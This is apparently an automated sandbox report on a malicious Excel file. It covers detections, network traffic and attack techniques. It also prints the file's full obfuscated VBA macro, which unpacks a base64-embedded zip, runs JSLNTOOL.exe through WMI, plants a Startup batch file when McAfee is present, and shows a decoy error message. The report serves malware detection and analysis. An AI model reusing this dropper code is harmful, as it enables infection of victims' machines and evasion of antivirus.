Windows Analysis Report
.xls

Overview

General Information

Sample name:.xls
Analysis ID:1634932
MD5:c0cff8451fb639d2fd1946df7969395e
SHA1:634d52e10e168a61c8201130f44925cc497c1251
SHA256:fd669c40ad347a178ceead1f771af78fed66c4313013641d32ca28981acb97d5
Tags:xls, user-zhuzhu0009
Infos:
Errors
  • Corrupt sample or wrongly selected analyzer.

Detection

Score:56
Range:0 - 100
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with many string operations indicating source code obfuscation
Document contains embedded VBA macros
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Suricata IDS alerts with low severity for network traffic

Classification

  • System is w10x64
  • EXCEL.EXE (PID: 8120 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • splwow64.exe (PID: 8568 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 13.107.246.60, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 8120, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49734
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.4, DestinationIsIpv6: false, DestinationPort: 49734, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 8120, Protocol: tcp, SourceIp: 13.107.246.60, SourceIsIpv6: false, SourcePort: 443
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-11T07:12:46.182510+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49734 | 13.107.246.60 | 443 | TCP
2025-03-11T07:12:49.028320+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49735 | 13.107.246.60 | 443 | TCP
2025-03-11T07:12:50.784291+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49736 | 13.107.246.60 | 443 | TCP

AV Detection

Source: .xlsVirustotal: Detection: 24%Perma Link
Source: .xlsReversingLabs: Detection: 15%
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: global trafficDNS query: name: otelrules.svc.static.microsoft
Source: global trafficTCP traffic: 192.168.2.4:49734 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49735 -> 13.107.246.60:443
Source: Joe Sandbox ViewIP Address: 13.107.246.60 13.107.246.60
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 13.107.246.60:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 13.107.246.60:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 13.107.246.60:443
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /rules/excel.exe-Production-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120600v5s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficDNS traffic detected: DNS query: otelrules.svc.static.microsoft
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734

System Summary

Source: .xlsOLE, VBA macro line: Open Environ(O000O110001OOOO11()) & O111OO111OO101101() For Output As fileNumber
Source: .xlsOLE, VBA macro line: Application.Quit
Source: .xlsOLE, VBA macro line: O11111O1O1110OO1O = Environ(O1O1OO101O11O010O())
Source: .xlsOLE indicator, VBA macros: true
Source: classification engineClassification label: mal56.expl.evad.winXLS@3/1@1/1
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\{6E5C2C0C-90D2-4C3E-B6C5-1C9082E603DF} - OProcSessId.dat
Source: .xlsOLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE File read: C:\Users\desktop.ini
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
Source: .xlsStatic file information: File size 3369984 > 1048576

Data Obfuscation

Source: .xlsStream path '_VBA_PROJECT_CUR/VBA/Sheet1' : High number of string operations
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe Window / User API: threadDelayed 855
Source: C:\Windows\splwow64.exe Last function: Thread delayed
Source: C:\Windows\splwow64.exe Thread delayed: delay time: 120000
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information queried: ProcessInformation
MITRE ATT&CK matrix (table flattened in extraction)
Tactic columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact
Numbered entries, in page order: 21 Scripting; 3 Exploitation for Client Execution; 21 Scripting; 1 Process Injection; 1 Masquerading; 1 Process Discovery; 1 Encrypted Channel; 1 Virtualization/Sandbox Evasion; 1 Virtualization/Sandbox Evasion; 1 Ingress Tool Transfer; 1 Process Injection; 1 Application Window Discovery; 2 Non-Application Layer Protocol; 1 Obfuscated Files or Information; 1 File and Directory Discovery; 3 Application Layer Protocol; 1 System Information Discovery
Source | Detection | Scanner | Label
.xls | 24% | Virustotal |
.xls | 16% | ReversingLabs | Document.Trojan.Chartres
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
s-0005.dual-s-msedge.net | 52.123.128.14 | true | false | | high
s-part-0032.t-0009.t-msedge.net | 13.107.246.60 | true | false | | high
otelrules.svc.static.microsoft | unknown | unknown | false | | high

Name | Malicious | Antivirus Detection | Reputation
https://otelrules.svc.static.microsoft/rules/excel.exe-Production-v19.bundle | false | | high
https://otelrules.svc.static.microsoft/rules/rule120600v5s19.xml | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
13.107.246.60 | s-part-0032.t-0009.t-msedge.net | United States | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
            Joe Sandbox version:42.0.0 Malachite
            Analysis ID:1634932
            Start date and time:2025-03-11 07:10:29 +01:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 4m 26s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:defaultwindowsofficecookbook.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:20
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:.xls
            Detection:MAL
            Classification:mal56.expl.evad.winXLS@3/1@1/1
            Cookbook Comments:
            • Found application associated with file extension: .xls
            • Found Word or Excel or PowerPoint or XPS Viewer
            • Attach to Office via COM
            • Scroll down
            • Close Viewer
            • Corrupt sample or wrongly selected analyzer.
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, sppsvc.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
            • Excluded IPs from analysis (whitelisted): 23.60.203.209, 52.109.32.97, 52.109.76.243, 104.208.16.91, 40.126.32.140, 52.123.128.14, 4.245.163.56
            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, eur.roaming1.live.com.akadns.net, neu-azsc-000.roaming.officeapps.live.com, onedscolprdcus17.centralus.cloudapp.azure.com, roaming.officeapps.live.com, dual-s-0005-office.config.skype.com, login.live.com, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, ukw-azsc-config.officeapps.live.com, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, fe3cr.delivery.mp.microsoft.com, config.officeapps.live.com, osiprod-neu-buff-azsc-000.northeurope.cloudapp.azure.com, ecs.office.trafficmanager.net, europe.configsvc1.live.com.akadns.net
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtCreateKey calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
02:12:38 | API Interceptor | 872x Sleep call for process: splwow64.exe modified
            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
            Category:dropped
            Size (bytes):118
            Entropy (8bit):3.5700810731231707
            Encrypted:false
            SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
            MD5:573220372DA4ED487441611079B623CD
            SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
            SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
            SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
            Malicious:false
            Reputation:high, very likely benign file
            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 932, Author: openpyxl, Last Saved By: admin, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Mar 6 03:21:37 2025, Last Saved Time/Date: Thu Mar 6 04:15:54 2025, Security: 0
            Entropy (8bit):6.11129490990527
            TrID:
            • Microsoft Excel sheet (30009/1) 47.99%
            • Microsoft Excel sheet (alternate) (24509/1) 39.20%
            • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
            File name:.xls
            File size:3'369'984 bytes
            MD5:c0cff8451fb639d2fd1946df7969395e
            SHA1:634d52e10e168a61c8201130f44925cc497c1251
            SHA256:fd669c40ad347a178ceead1f771af78fed66c4313013641d32ca28981acb97d5
            SHA512:53a9ceef961059cf33976c9915fa050f9f5d6b14fe77d28279b8d9594f3c168fae92d49193c7d0838e39f8c0ceff9f6685c654649588c2bd66f9e587d2bd24b1
            SSDEEP:49152:Ukc6HMAR8lxBiIZI6YKjqrb3QOtlmPb4XuqFMX+w7:
            TLSH:83F523207E829E3BC91C573C219FDF0A06615E808D46E5D733AC7B6F3A7BBA0524652D
            Icon Hash:35ed8e920e8c81b5
            Document Type:OLE
            Number of OLE Files:1
            Has Summary Info:
            Application Name:Microsoft Excel
            Encrypted Document:False
            Contains Word Document Stream:False
            Contains Workbook/Book Stream:True
            Contains PowerPoint Document Stream:False
            Contains Visio Document Stream:False
            Contains ObjectPool Stream:False
            Flash Objects Count:0
            Contains VBA Macros:True
            Code Page:932
            Author:openpyxl
            Last Saved By:admin
            Create Time:2025-03-06 03:21:37
            Last Saved Time:2025-03-06 04:15:54
            Creating Application:Microsoft Excel
            Security:0
            Document Code Page:932
            Thumbnail Scaling Desired:False
            Contains Dirty Links:False
            Shared Document:False
            Changed Hyperlinks:False
            Application Version:1048576
            General
            Stream Path:_VBA_PROJECT_CUR/Mkidajqwe
            VBA File Name:Mkidajqwe
            Stream Size:-1
            Data ASCII:
            Data Raw:
            Attribute VB_Name = "Mkidajqwe"
            Attribute VB_Base = "0{D3790334-D241-413C-A6B4-7B97CD9ED7EF}{249C2286-B847-4847-9AE3-E77BECF0F99A}"
            Attribute VB_GlobalNameSpace = False
            Attribute VB_Creatable = False
            Attribute VB_PredeclaredId = True
            Attribute VB_Exposed = False
            Attribute VB_TemplateDerived = False
            Attribute VB_Customizable = False
            

            General
            Stream Path:_VBA_PROJECT_CUR/VBA/Mkidajqwe
            VBA File Name:Mkidajqwe
            Stream Size:1158
            Attribute VB_Name = "Mkidajqwe"
            Attribute VB_Base = "0{D3790334-D241-413C-A6B4-7B97CD9ED7EF}{249C2286-B847-4847-9AE3-E77BECF0F99A}"
            Attribute VB_GlobalNameSpace = False
            Attribute VB_Creatable = False
            Attribute VB_PredeclaredId = True
            Attribute VB_Exposed = False
            Attribute VB_TemplateDerived = False
            Attribute VB_Customizable = False
            

            General
            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
            VBA File Name:Sheet1
            Stream Size:13155
            Attribute VB_Name = "Sheet1"
            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
            Attribute VB_GlobalNameSpace = False
            Attribute VB_Creatable = False
            Attribute VB_PredeclaredId = True
            Attribute VB_Exposed = True
            Attribute VB_TemplateDerived = False
            Attribute VB_Customizable = True
            Attribute VB_Control = "btttttttt, 1, 0, MSForms, CommandButton"
            Public O000O1OO0110O1101 As String
            Private Sub btttttttt_Click()
            OO111OO0011010OO0
            O11O11O1OO0OO0101
            End Sub
            Sub OO111OO0011010OO0()
            Dim O1001O100O00OO111() As Byte
            O110OO1011010O1O0 = O01000OO001OOO00O(8)
            O0OO100000O01O01O = O01O1OO011OO1O101() + O110OO1011010O1O0 & "\"
            O0011OO00O1O0O1OO = O0OO100000O01O01O & O110OO1011010O1O0 & O0010O110111O1O01()
            MkDir (O0OO100000O01O01O)
            With CreateObject(O110O0OO1O00OO00O()).createElement(O111O11101O0O1001())
            .DataType = OO01010O111O100O0()
            .Text = Mkidajqwe.Nmdaskqwe1.Text & Mkidajqwe.Nmdaskqwe2.Text & Mkidajqwe.Nmdaskqwe3.Text
            O1001O100O00OO111 = .nodeTypedValue
            End With
            Open O0011OO00O1O0O1OO For Binary As #1: Put #1, , O1001O100O00OO111: Close #1
            Set O10O11O01OO10OO0O = CreateObject(OO1O10OO1O0101O11()): Set O100001O010OO0010 = O10O11O01OO10OO0O.Namespace(O0011OO00O1O0O1OO).items: O10O11O01OO10OO0O.Namespace(O0OO100000O01O01O).CopyHere (O100001O010OO0010):
            O000O1OO0110O1101 = O0OO100000O01O01O
            Kill O0011OO00O1O0O1OO
            End Sub
            Sub O11O11O1OO0OO0101()
            Dim fileNumber As Integer
            If Dir(O1110OO11O11OO0O1(), vbDirectory) = "" Then
            GetObject(OO1011O10O00O111O()).Get(OO110OO0110OOO1OO()).Create O1O1OO1O01101O0O0() + O000O1OO0110O1101 & OO00OO0O111O100O0(), Null, Null, 0
            Else
            Text = O10OOO001O0111101() & vbCrLf & O1O1OO1O01101O0O0() & O000O1OO0110O1101 & OO00OO0O111O100O0()
            fileNumber = FreeFile
            Open Environ(O000O110001OOOO11()) & O111OO111OO101101() For Output As fileNumber
            Print #fileNumber, Text
            Close fileNumber
            End If
            MsgBox "Expanding the file failed. Please open https://support.microsoft.com/en-us/office/how-to-get-support-for-outlook-com-f5482a98-616c-4d44-b7c5-8aaaadf5c11a View Help", vbCritical, O01101001O0011010()
            Application.Quit
            End Sub
            Function O01O1OO011OO1O101() As String
            O11111O1O1110OO1O = Environ(O1O1OO101O11O010O())
            O01O1OO011OO1O101 = Array(O11111O1O1110OO1O + O101O1010O01O0O0O(), O11111O1O1110OO1O + O11110OO11OO1O010())(Int(Rnd * 2))
            End Function
            Function O01000OO001OOO00O(length As Integer) As String:
            Randomize Timer: For i = 1 To length: O01000OO001OOO00O = O01000OO001OOO00O & Mid(OO1111O01OO101O01(), Int(36 * Rnd + 1), 1): Next i:
            End Function
            Function O110OO001OOO111O1() As String
            O110OO001OOO111O1 = Chr(196 - 162) + """"
            End Function
            Function O0010O110111O1O01() As String
            O0010O110111O1O01 = "." + "z" + "i" + "p"
            End Function
            Function O110O0OO1O00OO00O() As String
            O110O0OO1O00OO00O = "M" + "S" + "X" + "M" + Chr(196 - 120) + "2" + "." + "D" + "O" + "M" + "D" + "o" + "c" + "u" + "m" + "e" + Chr(258 - 148) + "t"
            End Function
            Function OO01010O111O100O0() As String
            OO01010O111O100O0 = "b" + "i" + "n" + "." + "b" + "a" + "s" + "e" + "6" + "4"
            End Function
            Function OO1O10OO1O0101O11() As String
            OO1O10OO1O0101O11 = "S" + "h" + "e" + "l" + "l" + "." + "A" + "p" + "p" + "l" + "i" + Chr(236 - 137) + Chr(295 - 198) + "t" + "i" + Chr(238 - 127) + "n"
            End Function
            Function OO00OO0O111O100O0() As String
            OO00OO0O111O100O0 = "J" + "S" + "L" + "N" + "T" + "O" + "O" + "L" + "." + Chr(258 - 157) + "x" + "e"
            End Function
            Function OO1011O10O00O111O() As String
            OO1011O10O00O111O = "w" + "i" + "n" + Chr(298 - 189) + "g" + Chr(267 - 158) + "t" + Chr(265 - 150) + ":" + Chr(257 - 134) + "i" + "m" + "p" + "e" + "r" + "s" + Chr(226 - 115) + "n" + "a" + "t" + "i" + "o" + "n" + "L" + "e" + "v" + "e" + "l" + "=" + "i" + "m" + "p" + "e" + "r" + Chr(274 - 159) + "o" + "n" + "a" + "t" + "e" + "}" + "!" + "\" + Chr(196 - 104) + "." + "\" + "r" + "o" + Chr(274 - 163) + "t" + Chr(238 - 146) + "c" + "i" + "m" + Chr(282 - 164) + "2"
            End Function
            Function O1110OO11O11OO0O1() As String
            O1110OO11O11OO0O1 = "C" + ":" + "\" + Chr(217 - 137) + "r" + "o" + "g" + "r" + "a" + "m" + " " + "F" + Chr(213 - 108) + "l" + "e" + "s" + "\" + "M" + "c" + Chr(298 - 233) + "f" + "e" + "e"
            End Function
            Function O1O1OO101O11O010O() As String
            O1O1OO101O11O010O = "L" + "O" + Chr(269 - 202) + "A" + "L" + "A" + "P" + "P" + "D" + "A" + "T" + Chr(242 - 177)
            End Function
            Function O000O110001OOOO11() As String
            O000O110001OOOO11 = Chr(292 - 227) + Chr(236 - 156) + "P" + "D" + "A" + "T" + Chr(255 - 190)
            End Function
            Function OO110OO0110OOO1OO() As String
            OO110OO0110OOO1OO = O111O11101O0O1001() + "i" + "n" + "3" + "2" + Chr(248 - 153) + "P" + Chr(273 - 159) + "o" + "c" + "e" + "s" + "s"
            End Function
            Function O11110OO11OO1O010() As String
            O11110OO11OO1O010 = "\" + "M" + "i" + "c" + "r" + "o" + "s" + "o" + "f" + "t" + "\" + O111O11101O0O1001() + "i" + "n" + "d" + "o" + "w" + "s" + "\"
            End Function
            Function O01101001O0011010() As String
            O01101001O0011010 = "E" + "r" + "r" + "o" + "r"
            End Function
            Function O0O1OO1O101O01101() As String
            O0O1OO1O101O01101 = "\" + "\"
            End Function
            Function O1O1OO1O01101O0O0() As String
            O1O1OO1O01101O0O0 = "e" + "x" + "p" + "l" + "o" + "r" + "e" + "r" + "." + "e" + "x" + "e" + " "
            End Function
            Function O101O1010O01O0O0O() As String
            O101O1010O01O0O0O = "\" + "M" + "i" + "c" + "r" + "o" + "s" + "o" + "f" + "t" + "\" + "M" + "e" + Chr(223 - 123) + "i" + "a" + " " + "P" + Chr(259 - 151) + "a" + Chr(296 - 175) + Chr(267 - 166) + "r" + "\" + "T" + "r" + Chr(213 - 116) + "n" + "s" + Chr(300 - 201) + "o" + Chr(217 - 117) + "e" + "d" + Chr(109 - 77) + "F" + "i" + "l" + "e" + "s" + " " + "C" + "a" + "c" + Chr(263 - 159) + "e" + "\"
            End Function
            Function O111OO111OO101101() As String
            O111OO111OO101101 = "\" + "M" + Chr(227 - 122) + Chr(236 - 137) + "r" + Chr(277 - 166) + "s" + "o" + "f" + Chr(282 - 166) + "\" + O111O11101O0O1001() + "i" + "n" + Chr(212 - 112) + Chr(276 - 165) + "w" + Chr(281 - 166) + "\" + "S" + Chr(263 - 147) + "a" + "r" + "t" + " " + "M" + "e" + "n" + "u" + "\" + "P" + Chr(284 - 170) + "o" + Chr(217 - 114) + "r" + "a" + Chr(298 - 189) + "s" + "\" + "S" + "t" + "a" + "r" + "t" + Chr(296 - 179) + Chr(227 - 115) + "\" + "E" + "x" + "p" + "l" + "o" + "r" + "e" + "r" + "." + "b" + Chr(282 - 185) + "t"
            End Function
            Function O111O11101O0O1001() As String
            O111O11101O0O1001 = "W"
            End Function
            Function O10OOO001O0111101() As String
            O10OOO001O0111101 = "@" + "e" + "c" + "h" + "o" + " " + "o" + "f" + Chr(208 - 106)
            End Function
            Function OO1111O01OO101O01() As String
            OO1111O01OO101O01 = "A" + "B" + "C" + "D" + "E" + Chr(241 - 171) + "G" + "H" + "I" + "J" + Chr(284 - 209) + "L" + "M" + "N" + "O" + "P" + "Q" + Chr(296 - 214) + "S" + "T" + "U" + "V" + "W" + "X" + "Y" + "Z" + "0" + "1" + "2" + "3" + Chr(137 - 85) + Chr(288 - 235) + "6" + "7" + "8" + "9"
            End Function
            

            General
            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
            VBA File Name:Sheet2
            Stream Size:977
            Attribute VB_Name = "Sheet2"
            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
            Attribute VB_GlobalNameSpace = False
            Attribute VB_Creatable = False
            Attribute VB_PredeclaredId = True
            Attribute VB_Exposed = True
            Attribute VB_TemplateDerived = False
            Attribute VB_Customizable = True
            

            General
            Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
            VBA File Name:ThisWorkbook
            Stream Size:985
            Attribute VB_Name = "ThisWorkbook"
            Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
            Attribute VB_GlobalNameSpace = False
            Attribute VB_Creatable = False
            Attribute VB_PredeclaredId = True
            Attribute VB_Exposed = True
            Attribute VB_TemplateDerived = False
            Attribute VB_Customizable = True
            

            General
            Stream Path:\x1CompObj
            CLSID:
            File Type:data
            Stream Size:108
            Entropy:4.188499988527259
            Base64 Encoded:True
            General
            Stream Path:\x5DocumentSummaryInformation
            CLSID:
            File Type:data
            Stream Size:232
            Entropy:2.798395014391178
            Base64 Encoded:False
            General
            Stream Path:\x5SummaryInformation
            CLSID:
            File Type:data
            Stream Size:212
            Entropy:3.536404846148865
            Base64 Encoded:False
            General
            Stream Path:Ctls
            CLSID:
            File Type:data
            Stream Size:88
            Entropy:4.328638720860858
            Base64 Encoded:False
            General
            Stream Path:Workbook
            CLSID:
            File Type:Applesoft BASIC program data, first line number 16
            Stream Size:28442
            Entropy:4.8266028274261075
            Base64 Encoded:True
            General
            Stream Path:_VBA_PROJECT_CUR/Mkidajqwe/\x1CompObj
            CLSID:
            File Type:data
            Stream Size:97
            Entropy:3.6106491830605214
            Base64 Encoded:False
            General
            Stream Path:_VBA_PROJECT_CUR/Mkidajqwe/\x3VBFrame
            CLSID:
            File Type:ASCII text, with CRLF line terminators
            Stream Size:292
            Entropy:4.6423009411962335
            Base64 Encoded:True
            Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } M k i d a j q w e . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
            General
            Stream Path:_VBA_PROJECT_CUR/Mkidajqwe/f
            CLSID:
            File Type:data
            Stream Size:182
            Entropy:3.58067307433313
            Base64 Encoded:False
            General
            Stream Path:_VBA_PROJECT_CUR/Mkidajqwe/o
            CLSID:
            File Type:data
            Stream Size:3279488
            Entropy:6.000353718211798
            Base64 Encoded:False
            General
            Stream Path:_VBA_PROJECT_CUR/PROJECT
            CLSID:
            File Type:ASCII text, with CRLF line terminators
            Stream Size:665
            Entropy:5.238643805025801
            Base64 Encoded:True
            Data ASCII:I D = " { B 9 8 4 0 5 C 1 - 3 2 6 1 - 4 F D 6 - B 2 0 B - F B 0 E 1 8 5 3 0 9 B E } " . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . B a s e C l a s s = M k i d a j q w e . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i
            General
            Stream Path:_VBA_PROJECT_CUR/PROJECTwm
            CLSID:
            File Type:data
            Stream Size:113
            Entropy:3.3616454934709092
            Base64 Encoded:False
            General
            Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
            CLSID:
            File Type:data
            Stream Size:4460
            Entropy:4.6371480224979935
            Base64 Encoded:False
            General
            Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_0
            CLSID:
            File Type:data
            Stream Size:2480
            Entropy:4.361030430281233
            Base64 Encoded:False
            General
            Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_1
            CLSID:
            File Type:data
            Stream Size:234
            Entropy:3.003457249217219
            Base64 Encoded:False
            General
            Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_2
            CLSID:
            File Type:data
            Stream Size:978
            Entropy:2.6372912031198905
            Base64 Encoded:False
            General
            Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_3
            CLSID:
            File Type:data
            Stream Size:1180
            Entropy:2.99083882941708
            Base64 Encoded:False
            General
            Stream Path:_VBA_PROJECT_CUR/VBA/dir
            CLSID:
            File Type:MIPSEB MIPS-II ECOFF executable not stripped - version 72.9
            Stream Size:871
            Entropy:6.449176996802903
            Base64 Encoded:True
            Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
            2025-03-11T07:12:46.182510+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49734 | 13.107.246.60 | 443 | TCP
            2025-03-11T07:12:49.028320+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49735 | 13.107.246.60 | 443 | TCP
            2025-03-11T07:12:50.784291+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49736 | 13.107.246.60 | 443 | TCP
            Timestamp | Source Port | Dest Port | Source IP | Dest IP
            Mar 11, 2025 07:12:49.029356003 CET49735443192.168.2.413.107.246.60
            Mar 11, 2025 07:12:49.029371023 CET4434973513.107.246.60192.168.2.4
            Mar 11, 2025 07:12:49.531567097 CET4434973513.107.246.60192.168.2.4
            Mar 11, 2025 07:12:49.531583071 CET4434973513.107.246.60192.168.2.4
            Mar 11, 2025 07:12:49.531629086 CET4434973513.107.246.60192.168.2.4
            Mar 11, 2025 07:12:49.531678915 CET49735443192.168.2.413.107.246.60
            Mar 11, 2025 07:12:49.531733990 CET49735443192.168.2.413.107.246.60
            Mar 11, 2025 07:12:49.532397032 CET49735443192.168.2.413.107.246.60
            Mar 11, 2025 07:12:49.532443047 CET4434973513.107.246.60192.168.2.4
